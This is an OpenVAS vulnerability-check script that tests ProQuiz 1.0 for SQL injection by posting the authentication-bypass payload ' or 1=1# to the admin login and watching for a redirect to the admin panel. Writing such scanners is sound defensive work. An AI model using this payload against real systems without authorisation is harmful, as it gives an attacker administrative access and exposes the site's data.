###############################################################################
# OpenVAS Vulnerability Test
# $Id: ProQuiz_sql_injection.nasl 117 2009-03-10 18:21:01Z mime $
#
# ProQuiz 'Username' and 'Password' Parameters SQL Injection
# Vulnerability
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Michael Meyer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100040);
 script_bugtraq_id(32724);
 script_cve_id("CVE-2008-6312","CVE-2008-6327");
 script_version ("1.0");

 script_name(english:"ProQuiz 'Username' and 'Password' Parameters SQL Injection Vulnerability");
 desc["english"] = "

 Overview:
  ProQuiz is prone to an SQL-injection vulnerability because it fails
  to sufficiently sanitize user-supplied data before using it in an
  SQL query.

  Exploiting this issue could allow an attacker to compromise the
  application, access or modify data, or exploit latent
  vulnerabilities in the underlying database.

  ProQuiz 1.0 is vulnerable; other versions may also be affected. 

 See also:
  http://www.securityfocus.com/bid/32724

 Risk factor : Medium";

 script_description(english:desc["english"]);
 script_summary(english:"Determine if ProQuiz is vulnerable to SQL Injection");
 script_category(ACT_GATHER_INFO);
 script_family(english:"CGI abuses");
 script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
 script_dependencie("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);

dirs = make_list("/proquiz",cgi_dirs());

foreach dir (dirs) {

    url = string(dir, "/admin/index.php");
    req = http_get(item:url, port:port);
    buf = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if( buf == NULL )continue;

    if( egrep(pattern: "This is the Admin Panel of TRDC.IN", string: buf) ) {

	    variables = string("username=' or 1=1#&password=x");
	    filename = string(dir + "/admin/index.php");
	    host=get_host_name();

	    req = string(
	      "POST ", filename, " HTTP/1.0\r\n", 
	      "Referer: ","http://", host, filename, "\r\n",
	      "Host: ", host, ":", port, "\r\n", 
	      "Content-Type: application/x-www-form-urlencoded\r\n", 
	      "Content-Length: ", strlen(variables), 
	      "\r\n\r\n", 
	      variables
	    );

	    result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);

	    if(egrep(pattern: "Location: admin.php", string: result)) {
	         security_warning(port);
	         exit(0);
	     }
    }
}

exit(0);
